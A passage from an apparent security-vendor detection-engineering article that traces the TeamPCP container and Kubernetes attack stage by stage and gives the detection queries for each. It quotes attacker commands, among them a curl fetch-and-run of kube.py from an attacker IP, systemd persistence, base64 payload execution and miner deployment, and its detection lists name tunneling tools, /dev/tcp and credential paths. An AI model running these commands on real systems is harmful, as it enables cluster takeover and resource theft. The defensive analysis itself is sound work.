<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml">Service Account Token or Certificate Read Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon discovery:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image9.png" alt="Figure 2: Detection rules triggering for stage 2: Kubernetes Environment Discovery" title="Figure 2: Detection rules triggering for stage 2: Kubernetes Environment Discovery" /></p>
<h3>Stage 3 – Lateral movement via <code>kube.py</code></h3>
<p>When a service account token is present, the attacker downloads and executes a Python script designed to enumerate pods and execute commands across the cluster:</p>
<pre><code class="language-shell">curl -fsSL http://44.252.85[.]168:666/files/kube.py -o /tmp/k8s.py
python3 /tmp/k8s.py
</code></pre>
<p>At this point, the attacker’s goal is clear: turn a single compromised container into a foothold for cluster-wide propagation using legitimate Kubernetes APIs.</p>
<p>D4C detects this stage through a combination of file and process telemetry. A script is written to a temporary directory and executed immediately via an interpreter, all within an interactive container session.</p>
<p>Detecting an interactive <code>curl</code> command that pulls a file from a remote source is a strong detection signal for stale container workloads.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  (
    (process.name == &quot;curl&quot; or process.args in (
      &quot;curl&quot;, &quot;/bin/curl&quot;, &quot;/usr/bin/curl&quot;, &quot;/usr/local/bin/curl&quot;
    )
  ) and
    process.args in (
      &quot;-o&quot;, &quot;-O&quot;, &quot;--output&quot;, &quot;--remote-name&quot;,
      &quot;--remote-name-all&quot;, &quot;--output-dir&quot;
    )
  ) or
  (
    (process.name == &quot;wget&quot; or process.args in (
      &quot;wget&quot;, &quot;/bin/wget&quot;, &quot;/usr/bin/wget&quot;, &quot;/usr/local/bin/wget&quot;
    )
  ) and
  process.args like (&quot;-*O*&quot;, &quot;--output-document=*&quot;, &quot;--output-file=*&quot;)
  )
) and (
 process.args like~ &quot;*http*&quot; or
 process.args regex &quot;.*[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}[:/]{1}.*&quot;
) and container.id like &quot;?*&quot;
</code></pre>
<p>The detection rule above detects the remote file download, but we can go one step further by detecting a sequence for file creation, followed by its execution within the same container context:</p>
<pre><code class="language-sql">sequence by container.id, user.id with maxspan=3s
  [file where host.os.type == &quot;linux&quot; and event.type == &quot;creation&quot; and 
   process.interactive == true and container.id like &quot;?*&quot; and
   file.path like (
     &quot;/tmp/*&quot;, &quot;/var/tmp/*&quot;, &quot;/dev/shm/*&quot;, &quot;/root/*&quot;, &quot;/home/*&quot;
   ) and
   not process.name in (
     &quot;apt&quot;, &quot;apt-get&quot;, &quot;dnf&quot;, &quot;microdnf&quot;, &quot;yum&quot;, &quot;zypper&quot;, &quot;tdnf&quot;, &quot;apk&quot;,   
     &quot;pacman&quot;, &quot;rpm&quot;, &quot;dpkg&quot;
   )] by file.path
  [process where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; and 
   event.action == &quot;exec&quot; and process.interactive == true and
   container.id like &quot;?*&quot;] by process.executable
</code></pre>
<p>Here, we focus on interactive processes while excluding files created by package managers, since we expect those to be present in typical workloads.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml">File Creation and Execution Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml">File Download Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon lateral movement:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image10.png" alt="Figure 3: Detection rules triggering for stage 3: Lateral Movement via kube.py" title="Figure 3: Detection rules triggering for stage 3: Lateral Movement via kube.py" /></p>
<h3>Stage 4 – Establishing persistence via Systemd</h3>
<p>Persistence mechanisms such as systemd services are generally illogical in container environments. Most containers are designed to be short-lived, single-process workloads that rely on the container runtime or orchestrator for lifecycle management. They typically do not run a full init system, and even when systemd is present, changes made inside the container rarely survive redeployment, rescheduling, or image rebuilds.</p>
<p>As a result, attempts to establish persistence via <code>systemd</code> from within a container are a strong indicator of an anomaly. They often indicate one of two things: either the container is running with elevated privileges and access to the host filesystem, or the attacker expects to escape the container boundary and have their persistence mechanism take effect at the node level.</p>
<p>In the TeamPCP campaign, the attacker attempts to establish persistence by creating a <code>systemd</code> service:</p>
<pre><code class="language-shell">cat&gt;/etc/systemd/system/teampcp-react.service&lt;&lt;SVCEOF
[Unit]
Description=PCPcat React Scanner
After=network.target
[Service]
Type=simple
WorkingDirectory=${dir}
ExecStart=/usr/bin/python3 ${dir}/react.py
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
SVCEOF
</code></pre>
<p>This action is not consistent with normal container behavior. Writing systemd unit files from inside a container suggests an intent to persist beyond the container lifecycle, which is only meaningful if the underlying host is affected.</p>
<p>D4C captures this behavior as file creation activity in sensitive system locations originating from a container context. The following detection logic looks for write-oriented file activity in common Linux persistence paths, including systemd services, timers, cron jobs, sudoers files, and shell profile modifications:</p>
<pre><code class="language-sql">file where event.type != &quot;deletion&quot; and
/* open events currently only log file opens with write intent */
event.action in (&quot;creation&quot;, &quot;rename&quot;, &quot;open&quot;) and (
  file.path like (
    // Cron &amp; Anacron Jobs
    &quot;/etc/cron.allow&quot;, &quot;/etc/cron.deny&quot;, &quot;/etc/cron.d/*&quot;,
    &quot;/etc/cron.hourly/*&quot;, &quot;/etc/cron.daily/*&quot;, &quot;/etc/cron.weekly/*&quot;, 
    &quot;/etc/cron.monthly/*&quot;, &quot;/etc/crontab&quot;, &quot;/var/spool/cron/crontabs/*&quot;, 
    &quot;/var/spool/anacron/*&quot;,

    // At Job
    &quot;/var/spool/cron/atjobs/*&quot;, &quot;/var/spool/atjobs/*&quot;,

    // Sudoers
    &quot;/etc/sudoers*&quot;
  ) or
  (
    // Systemd Service/Timer
    file.path like (
      &quot;/etc/systemd/system/*&quot;, &quot;/etc/systemd/user/*&quot;,
      &quot;/usr/local/lib/systemd/system/*&quot;, &quot;/lib/systemd/system/*&quot;, 
      &quot;/usr/lib/systemd/system/*&quot;, &quot;/usr/lib/systemd/user/*&quot;,
      &quot;/home/*/.config/systemd/user/*&quot;, &quot;/home/*/.local/share/systemd/user/*&quot;,
      &quot;/root/.config/systemd/user/*&quot;, &quot;/root/.local/share/systemd/user/*&quot;
    ) and
    file.extension in (&quot;service&quot;, &quot;timer&quot;)
  ) or
  (
    // Shell Profile Configuration
    file.path like (&quot;/etc/profile.d/*&quot;, &quot;/etc/zsh/*&quot;) or (
      file.path like (&quot;/home/*/*&quot;, &quot;/etc/*&quot;, &quot;/root/*&quot;) and
      file.name in (
  	 &quot;profile&quot;, &quot;bash.bashrc&quot;, &quot;bash.bash_logout&quot;, &quot;csh.cshrc&quot;,
        &quot;csh.login&quot;, &quot;config.fish&quot;, &quot;ksh.kshrc&quot;, &quot;.bashrc&quot;,
        &quot;.bash_login&quot;, &quot;.bash_logout&quot;, &quot;.bash_profile&quot;, &quot;.bash_aliases&quot;, 
        &quot;.zprofile&quot;, &quot;.zshrc&quot;, &quot;.cshrc&quot;, &quot;.login&quot;, &quot;.logout&quot;, &quot;.kshrc&quot;
      )
    )
  )
) and container.id like &quot;?*&quot; and
not process.name in (
  &quot;apt&quot;, &quot;apt-get&quot;, &quot;dnf&quot;, &quot;microdnf&quot;, &quot;yum&quot;, &quot;zypper&quot;, &quot;tdnf&quot;,
  &quot;apk&quot;, &quot;pacman&quot;, &quot;rpm&quot;, &quot;dpkg&quot;
)
</code></pre>
<p>This detection does not focus solely on <code>systemd</code>. Instead, it models persistence more broadly by covering multiple common Linux persistence vectors that attackers may attempt once code execution is achieved. By explicitly excluding package managers, the rule reduces noise from legitimate update and installation activity.</p>
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml">Modification of Persistence Relevant Files Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon persistence:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image5.png" alt="Figure 4: Detection rules triggering for stage 4: Establishing Persistence via Systemd" title="Figure 4: Detection rules triggering for stage 4: Establishing Persistence via Systemd" /></p>
<p>When this detection fires in a container context, it is a strong indicator of post-compromise behavior with potential host-level impact. It highlights activity that is not only suspicious but also structurally incompatible with how containers are expected to behave.</p>
<h3>Stage 5 – Installing tooling at runtime</h3>
<p>In Docker-based deployments, the attacker installs required tooling dynamically:</p>
<pre><code class="language-shell">apk add --no-cache curl bash python3
</code></pre>
<p>This allows the same payload to run across different base images without modification.</p>
<p>From a defender’s perspective, runtime package installation inside a container is a strong indicator of post-deployment tampering. D4C detects this through process execution telemetry tied to known package managers.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  (
    process.name in (
      &quot;apt&quot;, &quot;apt-get&quot;, &quot;dnf&quot;, &quot;microdnf&quot;, &quot;yum&quot;, &quot;zypper&quot;, &quot;tdnf&quot;
    ) and process.args == &quot;install&quot;
  ) or
  (process.name == &quot;apk&quot; and process.args == &quot;add&quot;) or
  (process.name == &quot;pacman&quot; and process.args like &quot;-*S*&quot;) or
  (process.name in (&quot;rpm&quot;, &quot;dpkg&quot;) and process.args in (&quot;-i&quot;, &quot;--install&quot;))
) and
process.args like (
  &quot;curl&quot;, &quot;wget&quot;, &quot;socat&quot;, &quot;busybox&quot;, &quot;openssl&quot;, &quot;torsocks&quot;,
  &quot;netcat&quot;, &quot;netcat-openbsd&quot;, &quot;netcat-traditional&quot;, &quot;ncat&quot;, &quot;tor&quot;,
  &quot;python*&quot;, &quot;perl&quot;, &quot;node&quot;, &quot;nodejs&quot;, &quot;ruby&quot;, &quot;lua&quot;, &quot;bash&quot;, &quot;sh&quot;,
  &quot;dash&quot;, &quot;zsh&quot;, &quot;fish&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;ksh&quot;
) and container.id like &quot;?*&quot;
</code></pre>
<p>Not all package installations in containers are malicious. Upon orchestration, containers need to install certain packages to run. However, because threat actors often use package managers to install their required tooling, this is a strong signal for already-deployed container runtimes.</p>
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_tool_installation.toml">Tool Installation Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon tool installation:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image2.png" alt="Figure 5: Detection rules triggering for stage 5: Installing Tooling at Runtime" title="Figure 5: Detection rules triggering for stage 5: Installing Tooling at Runtime" /></p>
<h3>Stage 6 – Establishing tunneling and proxy access</h3>
<p>Once stable execution and persistence are in place, TeamPCP shifts focus from access to connectivity. At this stage, the attackers deploy tunneling and proxy tooling such as frps and gost to expose internal services and maintain reliable external access.</p>
<p>The purpose of this step is to convert compromised containers into reusable infrastructure. By establishing tunnels or forwarders, the attackers can pivot into other environments, relay traffic, or reuse the compromised workload as part of a larger attack chain.</p>
<p>D4C detects this activity through process execution telemetry. The execution of known tunneling tools inside containers is uncommon for legitimate workloads and stands out clearly when combined with interactive execution and container context.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
  (
    // Tunneling and/or Port Forwarding via process args
    (process.args regex &quot;&quot;&quot;.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{1,5}:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{1,5}.*&quot;&quot;&quot;) or
    // gost
    (process.name == &quot;gost&quot; and process.args : (&quot;-L*&quot;, &quot;-C*&quot;, &quot;-R*&quot;)) or
    // ssh
    (process.name == &quot;ssh&quot; and (
     process.args like (&quot;-*R*&quot;, &quot;-*L*&quot;, &quot;-*D*&quot;, &quot;-*w*&quot;) and 
     not (process.args == &quot;chmod&quot; or process.args like &quot;*rungencmd*&quot;))
    ) or
    // ssh Tunneling and/or Port Forwarding via SSH option
    (process.name == &quot;ssh&quot; and process.args == &quot;-o&quot; and process.args like~(
      &quot;*ProxyCommand*&quot;, &quot;*LocalForward*&quot;, &quot;*RemoteForward*&quot;,
      &quot;*DynamicForward*&quot;, &quot;*Tunnel*&quot;, &quot;*GatewayPorts*&quot;, 
      &quot;*ExitOnForwardFailure*&quot;, &quot;*ProxyCommand*&quot;, &quot;*ProxyJump*&quot;
      )
    ) or
    // sshuttle
    (process.name == &quot;sshuttle&quot; and
     process.args in (&quot;-r&quot;, &quot;--remote&quot;, &quot;-l&quot;, &quot;--listen&quot;)
    ) or
    // earthworm
    (process.args == &quot;-s&quot; and process.args == &quot;-d&quot; and
     process.args == &quot;rssocks&quot;
    ) or
    // socat
    (process.name == &quot;socat&quot; and
     process.args like~ (&quot;TCP4-LISTEN:*&quot;, &quot;SOCKS*&quot;)
    ) or
    // chisel
    (process.name like~ &quot;chisel*&quot; and process.args in (&quot;client&quot;, &quot;server&quot;)) or
    // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy &amp; ngrok 
    (process.name in (
      &quot;iodine&quot;, &quot;iodined&quot;, &quot;dnscat&quot;, &quot;hans&quot;, &quot;hans-ubuntu&quot;, &quot;ptunnel-ng&quot;,
      &quot;ssf&quot;, &quot;3proxy&quot;, &quot;ngrok&quot;, &quot;wstunnel&quot;, &quot;pivotnacci&quot;, &quot;frps&quot;, 
      &quot;proxychains&quot;
      )
    )
  )
) and container.id like &quot;?*&quot;
</code></pre>
<p>There are many tunneling and port forwarding tools available on Linux systems. The umbrella rule displayed above leverages a combination of regex, process names, and process arguments to detect commonly observed tunneling activity.</p>
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml">Tunneling and/or Port Forwarding Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon tunneling and proxy access:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image8.png" alt="Figure 6: Detection rules triggering for stage 6: Establishing Tunneling and Proxy Access" title="Figure 6: Detection rules triggering for stage 6: Establishing Tunneling and Proxy Access" /></p>
<p>Detecting tunneling is important because it often marks the transition from short-lived compromise to sustained attacker presence. When correlated with earlier stages, it provides strong confirmation of intentional, ongoing abuse rather than opportunistic execution.</p>
<h3>Stage 7 – Encoded payload execution</h3>
<p>To obscure payload logic, the attacker executes a base64-encoded payload directly via Python:</p>
<pre><code class="language-shell">python3 -c &quot;exec(base64.b64decode('&lt;payload&gt;').decode())&quot;
</code></pre>
<p>This technique reduces visibility into the payload itself but introduces distinctive execution characteristics: encoded arguments passed directly to an interpreter in an interactive session.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  (process.name in (
    &quot;base64&quot;, &quot;base64plain&quot;, &quot;base64url&quot;, &quot;base64mime&quot;, &quot;base64pem&quot;,
    &quot;base32&quot;, &quot;base16&quot;
    ) and process.args like~ &quot;*-*d*&quot;
  ) or
  (process.name == &quot;xxd&quot; and process.args like~ (&quot;-*r*&quot;, &quot;-*p*&quot;)) or
  (process.name == &quot;openssl&quot; and process.args == &quot;enc&quot; and
   process.args in (&quot;-d&quot;, &quot;-base64&quot;, &quot;-a&quot;)
  ) or
  (process.name like &quot;python*&quot; and (
    (process.args == &quot;base64&quot; and process.args in (&quot;-d&quot;, &quot;-u&quot;, &quot;-t&quot;)) or
    (process.args == &quot;-c&quot; and process.args like &quot;*base64*&quot; and
     process.args like &quot;*b64decode*&quot;)
    )
  ) or
  (process.name like &quot;perl*&quot; and process.args like &quot;*decode_base64*&quot;) or
  (process.name like &quot;ruby*&quot; and process.args == &quot;-e&quot; and
   process.args like &quot;*Base64.decode64*&quot;
  )
) and container.id like &quot;?*&quot;
</code></pre>
<p>There are many ways to decode a payload, but the umbrella rule shown above captures the most commonly observed techniques.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml">Encoded Payload Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/df9c27d82e74eb51e39376f1af30d2beb738c673/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml">Suspicious Interpreter Execution Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml">Decoded Payload Piped to Interpreter Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon execution:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image12.png" alt="Figure 7: Detection rules triggering for stage 7: Encoded Payload Execution" title="Figure 7: Detection rules triggering for stage 7: Encoded Payload Execution" /></p>
<h3>Stage 8 – Miner deployment and execution</h3>
<p>Eventually, the attacker reconstructs a miner from base64, writes it to disk, makes it executable, and launches it:</p>
<pre><code class="language-shell">/bin/sh -c &quot;printf IyEvYmlu&lt;&lt;TRUNCATED&gt;&gt;&gt;***** &gt;&gt; /tmp/miner.b64&quot;
/bin/sh -c &quot;base64 -d /tmp/miner.b64 &gt; /tmp/miner &amp;&amp; chmod +x /tmp/miner &amp;&amp; rm /tmp/miner.b64&quot;
</code></pre>
<p>This stage represents the shift from setup to monetization. The attacker is now actively abusing cluster resources.</p>
<p>As mentioned previously, D4C will detect decoding of the base64 payload using the same rule linked in the previous stage. Three other signals that are important to detect are the creation of a base64 encoded payload, file permission changes in specific directories, and execution of newly created binaries in temporary directories.</p>
<p>For the creation of base64 encoded payloads, an umbrella rule was created that detects the execution of a shell with echo/printf built-ins, and a whitelist of commonly abused command lines:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and 
process.interactive == true and process.name in (
  &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;
) and process.args == &quot;-c&quot; and process.args like (&quot;*echo *&quot;, &quot;*printf *&quot;) and 
process.args like (
  &quot;*/etc/cron*&quot;, &quot;*/etc/rc.local*&quot;, &quot;*/dev/tcp/*&quot;, &quot;*/etc/init.d*&quot;,
  &quot;*/etc/update-motd.d*&quot;, &quot;*/etc/ld.so*&quot;, &quot;*/etc/sudoers*&quot;, &quot;*base64 *&quot;, 
  &quot;*base32 *&quot;, &quot;*base16 *&quot;, &quot;*/etc/profile*&quot;, &quot;*/dev/shm/*&quot;, &quot;*/etc/ssh*&quot;, 
  &quot;*/home/*/.ssh/*&quot;, &quot;*/root/.ssh*&quot; , &quot;*~/.ssh/*&quot;, &quot;*xxd *&quot;, &quot;*/etc/shadow*&quot;,
  &quot;* /tmp/*&quot;, &quot;* /var/tmp/*&quot;, &quot;* /dev/shm/* &quot;, &quot;* ~/*&quot;, &quot;* /home/*&quot;,
  &quot;* /run/*&quot;, &quot;* /var/run/*&quot;, &quot;*|*sh&quot;, &quot;*|*python*&quot;, &quot;*|*php*&quot;, &quot;*|*perl*&quot;,
  &quot;*|*busybox*&quot;, &quot;*/var/www/*&quot;, &quot;*&gt;*&quot;, &quot;*;*&quot;, &quot;*chmod *&quot;, &quot;*rm *&quot; 
) and container.id like &quot;?*&quot;
</code></pre>
<p>Especially for interactive processes, the following detection rule is a high signal.</p>
<p>The second piece of the flow relates to the file permission changes. Not all file permission changes are malicious, but detecting file permission changes to executable files in world-writeable directories via an interactive process within a container is not expected to occur frequently.</p>
<pre><code class="language-sql">any where event.category in (&quot;file&quot;, &quot;process&quot;) and
event.type in (&quot;change&quot;, &quot;creation&quot;, &quot;start&quot;) and (
  process.name == &quot;chmod&quot; or
  (
    /*
    account for tools that execute utilities as a subprocess,
    in this case the target utility name will appear as a process arg
    */
    process.name in (
      &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;, &quot;busybox&quot;
    ) and
    process.args in (
      &quot;chmod&quot;, &quot;/bin/chmod&quot;, &quot;/usr/bin/chmod&quot;, &quot;/usr/local/bin/chmod&quot;
    )
  )
) and process.args in (&quot;4755&quot;, &quot;755&quot;, &quot;777&quot;, &quot;0777&quot;, &quot;444&quot;, &quot;+x&quot;, &quot;a+x&quot;) and
container.id like &quot;?*&quot;
</code></pre>
<p>Note that we leverage the file and process event categories here. The reason for this is that D4C captures these changes through file events if set specifically in the policy, but by default will capture these process executions when set to detect <code>execve</code> calls.</p>
<p>The final piece of this chain relates to the execution of binaries in world-writeable locations. Most container runtimes will not execute payloads from these directories.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  process.executable like (
    &quot;/tmp/*&quot;, &quot;/dev/shm/*&quot;, &quot;/var/tmp/*&quot;, &quot;/run/*&quot;, &quot;/var/run/*&quot;,
    &quot;/mnt/*&quot;, &quot;/media/*&quot;, &quot;/boot/*&quot;
  ) or
  // Hidden process execution
  process.name like &quot;.*&quot;
) and container.id like &quot;?*&quot;
</code></pre>
<p>Note that the rule also captures hidden process executions. This is a technique commonly observed by threat actors as well, as they may attempt to evade detection by marking processes as hidden.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml">File Execution Permission Modification Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml">Suspicious Echo or Printf Execution Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml">Suspicious Process Execution Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon miner deployment and execution:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image11.png" alt="Figure 8: Detection rules triggering for stage 8: Miner Deployment and Execution" title="Figure 8: Detection rules triggering for stage 8: Miner Deployment and Execution" /></p>
<h3>Stage 9 – Escalation to Node Control</h3>
<p>Once the attacker has a foothold inside a container and access to an overprivileged service account, the next step is to abuse the Kubernetes control plane itself. This stage moves the attack beyond a single container and into cluster-wide impact. This activity is detected via Kubernetes audit logs. The Kubernetes audit log rules surfaced by this intrusion fall into three distinct patterns.</p>
<h4>Stage 9.1 – Reconnaissance &amp; API Abuse</h4>
<p>The attacker's <code>kube.py</code> script uses the stolen service account token to enumerate pods, secrets, and nodes across all namespaces. From Kubernetes' perspective, this looks like a single identity making a burst of API calls across multiple resource types, a pattern that maps directly to permission enumeration detection logic. The use of Python's <code>urllib</code> rather than <code>kubectl</code> is also unusual as an API client.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/discovery_endpoint_permission_enumeration_by_user_and_srcip.toml">Kubernetes Potential Endpoint Permission Enumeration Attempt Detected</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml">Direct Interactive Kubernetes API Request by Unusual Utilities</a></li>
</ul>
<p>Resulting in the following detection alerts upon reconnaissance and API abuse:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image7.png" alt="Figure 9: Detection rules triggering for stage 9.1: Reconnaissance &amp; API Abuse" title="Figure 9: Detection rules triggering for stage 9.1: Reconnaissance &amp; API Abuse" /></p>
<h4>Stage 9.2 – Privilege Escalation &amp; Workload Manipulation</h4>
<p>With enumeration complete, the attacker creates a privileged DaemonSet (<code>system-monitor</code>) and relies on the overprivileged ClusterRole that was bound to the compromised service account. Both the workload creation and the role that enabled it are flagged: the DaemonSet as a sensitive workload modification, and the ClusterRole binding as a sensitive role granting broad permissions, including <code>pods/exec</code>, secret access, and DaemonSet creation.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml">Unusual Kubernetes Sensitive Workload Modification</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml">Kubernetes Creation or Modification of Sensitive Role</a></li>
</ul>
<p>Resulting in the following detection alerts upon privilege escalation and workload manipulation:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image13.png" alt="Figure 10: Detection rules triggering for stage 9.2: Privilege Escalation &amp; Workload Manipulation" title="Figure 10: Detection rules triggering for stage 9.2: Privilege Escalation &amp; Workload Manipulation" /></p>
<h4>Stage 9.3 – Node-Level Escape</h4>
<p>The DaemonSet's pod spec is designed to break every isolation boundary a container normally provides. It requests privileged mode, attaches to the host network and PID namespace, and mounts the node's root filesystem. Each of these properties triggers a separate detection rule, and together they paint a clear picture of a container workload engineered for node escape.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml">Kubernetes Pod Created with a Sensitive hostPath Volume</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml">Kubernetes Privileged Pod Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml">Kubernetes Pod Created With HostNetwork</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml">Kubernetes Pod Created With HostPID</a></li>
</ul>
<p>Resulting in the following detection alerts upon node-level escape:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image3.png" alt="Figure 11: Detection rules triggering for stage 9.3: Node-Level Escape" title="Figure 11: Detection rules triggering for stage 9.3: Node-Level Escape" /></p>
<p>These three sub-stages also highlight a key boundary in container-focused detection. While D4C excels at observing what happens <em>inside</em> containers, identifying how and <em>why</em> those containers were created requires Kubernetes control-plane telemetry. In a follow-up “Kubernetes Detection Engineering” series, we will focus on correlating D4C runtime events with Kubernetes Audit logs to detect multi-stage attacks that span workload creation, privilege escalation, and node-level impact.</p>
<p>For anyone already familiar with Kubernetes audit logs or interested in learning more about them, we have several prebuilt detection rules available that leverage the Kubernetes audit log framework in our <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/kubernetes">GitHub detection-rules repository</a>.</p>
<h3>Stage 10 – Web Server Exploitation via React2Shell</h3>
<p>In addition to exploiting compromised containers and Kubernetes control paths, TeamPCP also leverages direct web server exploitation to gain shell access on exposed services. One of the techniques referenced in related campaigns is React2Shell, where vulnerable web applications are abused to achieve remote command execution and drop into an interactive shell.</p>
<p>The attacker’s objective here is straightforward: expand access beyond Kubernetes workloads and increase the number of entry points into the environment. Web-facing services are often less strictly isolated than containers and can provide a fast path to host-level compromise if left unpatched.</p>
<p>From a detection standpoint, this activity is already well covered. Elastic provides an umbrella web server exploitation detection that flags suspicious command execution patterns originating from web server processes. In addition, multiple host-based Linux detections identify post-exploitation behavior following successful web shell access, such as unexpected shell execution, command interpreters launched by web services, and follow-on tooling execution.</p>
<p>Detecting this stage is important because it represents an alternative ingress path that bypasses container-specific defenses entirely. When correlated with earlier D4C detections, React2Shell-style exploitation helps confirm that the attacker is actively pursuing multiple avenues of access, increasing both blast radius and persistence potential.</p>
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml">Web Server Exploitation Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon web server exploitation:</p>
